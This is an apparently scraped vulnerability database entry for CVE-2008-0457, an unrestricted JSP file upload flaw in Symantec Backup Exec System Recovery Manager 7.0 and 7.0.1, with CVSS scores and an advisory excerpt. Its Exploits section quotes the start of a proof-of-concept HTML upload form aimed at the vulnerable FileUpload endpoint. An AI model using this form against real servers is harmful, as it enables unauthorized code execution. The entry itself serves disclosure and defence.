10
CVSSv2

CVE-2008-0457

Published: 07/02/2008 Updated: 15/10/2018
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote malicious users to upload and execute arbitrary JSP files via unknown vectors.

Affected Products

Vendor Product Versions
SymantecBackupexec System Recovery7.0, 7.01

Vendor Advisories

An unauthorized script can be uploaded to Symantec Backup Exec System Recovery Manager ...

Exploits

source: wwwsecurityfocuscom/bid/27487/info Symantec Backup Exec System Recovery Manager is prone to a vulnerability that allows arbitrary unauthorized files to be uploaded to any location on the affected server This issue resides in the Symantec LiveState Apache Tomcat server Attackers can leverage it to execute arbitrary code with SYS ...
<?xml version="10"?> <html xmlns="wwww3org/1999/xhtml"> <head><title>File Upload POC</title></head> <body> <h2> Backup Exec System Recovery Manager 70<br>File Upload POC</h2> <form action="<TARGET>:8443/axis/FileUpload" method="post" enctype="multipa ...